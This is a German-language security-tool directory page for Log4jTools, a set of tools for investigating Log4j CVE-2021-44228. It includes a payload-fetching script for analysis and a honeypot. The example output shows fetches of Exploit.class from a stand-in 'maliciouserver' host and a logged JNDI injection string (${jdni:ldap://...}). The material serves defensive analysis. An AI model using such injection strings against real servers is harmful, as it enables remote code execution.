Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Log4jTools — Werkzeuge zur Untersuchung von Log4j CVE-2021-44228 | Kitploit
Tools/GitHubGitHub/malwaretech/log4jtools
Payload-GenerierungSchwachstellenanalyseExploitationInformationsbeschaffungEinbruchserkennung
GitHubmalwaretech/log4jtools

Log4jTools

Werkzeuge zur Untersuchung von Log4j CVE-2021-44228

Repository anzeigen
9412vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Log4jTools

Werkzeuge zur Untersuchung von Log4j CVE-2021-44228

Fehlererklärung und Demo

https://www.youtube.com/watch?v=0-abhd-CLwQ

FetchPayload.py (Java-Payload von LDAP-Pfad in JNDI-Lookup abrufen).

Voraussetzungen: curl (System), requests (Python)

Beispielbefehl:

root@kitploit:~
python FetchPayload.py ldap://maliciouserver:1337/path

[+] getting object from ldap://maliciouserver:1337/path
[+] exploit payload: http://maliciouserver:80/Exploit.class
[+] seeing if attacker left behind un-compile payload http://maliciouserver:80/Exploit.java
[x] failed to find payload Exploit.java
[+] trying to fetch compiled payload http://maliciouserver:80/Exploit.class
[+] found payload and saved to file Exploit.class_

SimpleHoneypot.py (Honeypot zum Abfangen von Exploit-Versuchen basierend auf Vorhandensein von '${' ).

Voraussetzungen: python3, asyncore

Beispielbefehl:

root@kitploit:~
python3 SimpleHoneypot.py

[2021-12-09 13:00:00,000] Possible CVE-2021-44228 Attempt: 127.0.0.1:1111 -> port 8080 - GET /?id=${jdni:ldap://127.0.0.1:1389/hax} HTTP/1.1
Tool herunterladen